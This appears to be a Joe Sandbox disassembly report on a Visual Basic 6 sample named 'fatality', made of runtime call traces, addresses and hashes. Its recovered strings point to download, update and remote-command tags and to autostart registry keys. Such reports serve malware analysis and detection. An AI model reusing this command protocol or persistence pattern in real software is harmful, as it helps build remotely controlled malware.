                                                                                                                                                            • API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
                                                                                                                                                            • String ID: 0000
                                                                                                                                                            • API String ID: 292954213-211534962
                                                                                                                                                            • Opcode ID: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                            • Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
                                                                                                                                                            • Opcode Fuzzy Hash: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                            • Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 00411D2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D5B
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 00411D6A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411D80
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D8B
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                              • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,004025E6), ref: 00411D9D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411DB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411DBE
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60(6CFA6537,00000000,00000000), ref: 004156CA
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                              • Part of subcall function 00415660: __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                              • Part of subcall function 00415660: #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                              • Part of subcall function 00415660: __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                              • Part of subcall function 00415660: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                              • Part of subcall function 00415660: #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                              • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                              • Part of subcall function 00415660: __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                              • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                              • Part of subcall function 00415660: #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                              • Part of subcall function 00415660: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6), ref: 00411DDF
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,00000006,00000006,?,00000000,?,00000000,004025E6), ref: 00411E04
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E0F
                                                                                                                                                            • #580.MSVBVM60(00000000,?,00000000,?,00000000,004025E6), ref: 00411E16
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E1F
                                                                                                                                                            • #598.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E2C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004043C4,0041B024,0041B09C,?,00000000,?,00000000,004025E6), ref: 00411E5D
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411E97
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 00411EB8
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0041B09C,00000000,?,00000020), ref: 00411EDE
                                                                                                                                                            • #598.MSVBVM60(?,00000000,004025E6), ref: 00411EEE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,004025E6), ref: 00411F10
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,00000000,?,00000000,004025E6), ref: 00411F2C
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 00411F37
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00000000,?,00000000,004025E6), ref: 00411F46
                                                                                                                                                            • #598.MSVBVM60(?,00000000,004025E6), ref: 00411F53
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411F72
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411F81
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?), ref: 00411F97
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(004123A7), ref: 00412397
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004123A0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
                                                                                                                                                            • String ID: 5
                                                                                                                                                            • API String ID: 3012955283-2226203566
                                                                                                                                                            • Opcode ID: 4c51faa2736fb7085ee1db596ec4db0ff330f662fb4349c4903174346d8d8e19
                                                                                                                                                            • Instruction ID: b2978daf75234b14887ffa37483130b8305288e28cd3c1483e6757a63013c22d
                                                                                                                                                            • Opcode Fuzzy Hash: 4c51faa2736fb7085ee1db596ec4db0ff330f662fb4349c4903174346d8d8e19
                                                                                                                                                            • Instruction Fuzzy Hash: 9302E771900248EFDB04DFE0DE58BDEBBB5FB48305F108169E606B76A0DB781A85DB58
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,0040AA6C,0041B090), ref: 0040F1EE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040F21E
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                              • Part of subcall function 0040FA50: #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                              • Part of subcall function 0040FA50: #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                              • Part of subcall function 0040FA50: #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                            • __vbaStrMove.MSVBVM60(0040AA6C,?,?,?,00000000,004025E6), ref: 0040F239
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F24D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F256
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F267
                                                                                                                                                            • #712.MSVBVM60(00000000,0040728C,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F291
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F29C
                                                                                                                                                            • #712.MSVBVM60(00000000,00407294,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F2BD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F2C8
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2E2
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2FF
                                                                                                                                                            • #712.MSVBVM60(00000000,004072A0,004072B8,00000001,000000FF,00000000), ref: 0040F33A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040F345
                                                                                                                                                            • #712.MSVBVM60(00000000,004072AC,004072C0,00000001,000000FF,00000000), ref: 0040F366
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040F371
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001), ref: 0040F38B
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001), ref: 0040F3A8
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,<xCommand,00000001,00000001), ref: 0040F3CA
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$#712$#516#631BstrChkstkErrorFile$#525#570#648CloseCopyGet3Open
                                                                                                                                                            • String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
                                                                                                                                                            • API String ID: 3601514899-954089795
                                                                                                                                                            • Opcode ID: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                            • Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
                                                                                                                                                            • Opcode Fuzzy Hash: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                            • Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(00000000,00000000), ref: 004111FE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00411206
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0041120A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411222
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411231
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411243
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000000), ref: 0041124A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411252
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411255
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411262
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411287
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 0041128E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411299
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004112A1
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004112A5
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004112AD
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004112B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004112EF
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 004112F2
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041130F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411471
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041147A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041147E
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00411487
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00411495
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004112DE
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004112C4
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411323
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411326
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411339
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0041133D
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411355
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411364
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411370
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041137A
                                                                                                                                                            • #525.MSVBVM60(00001000), ref: 00411385
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411390
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411398
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 0041139B
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004113D2
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004113DB
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004113E3
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004113EC
                                                                                                                                                            • #598.MSVBVM60 ref: 00411404
                                                                                                                                                            • #525.MSVBVM60(-00000001), ref: 00411424
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041142F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411437
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00411440
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411448
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00411451
                                                                                                                                                            • #598.MSVBVM60 ref: 0041145E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004114A9
                                                                                                                                                              • Part of subcall function 0040EAB0: #594.MSVBVM60(?,6CEBD9F5,-00000001,6CEBD8B1), ref: 0040EB1A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                              • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                              • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004114BD
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004114C5
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004114CE
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004114E2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004114ED
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 004114F0
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004114F9
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041150F
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00411518
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041151D
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00411520
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00411529
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00411572), ref: 00411560
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00411565
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041156A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041156F
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00411589
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 936154001-0
                                                                                                                                                            • Opcode ID: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
                                                                                                                                                            • Instruction ID: ff6c34d3fed2378173252cfce728cf62963b49a80d3fcd64e048a008bc34630c
                                                                                                                                                            • Opcode Fuzzy Hash: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
                                                                                                                                                            • Instruction Fuzzy Hash: F6B12D71D00218AFDB04DFE4DE88AEE7BB9FB88311F10452AE616E72A0DB745945CF58
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040BF4E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040BF95
                                                                                                                                                              • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                              • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,00000000,80000002,00000000,Start,00000004,80000002,00000000,Start,00000002,80000001,00000000,00000000,00000000), ref: 0040C00B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C016
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,00000000,004025E6), ref: 0040C030
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C03B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                              • Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                              • Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
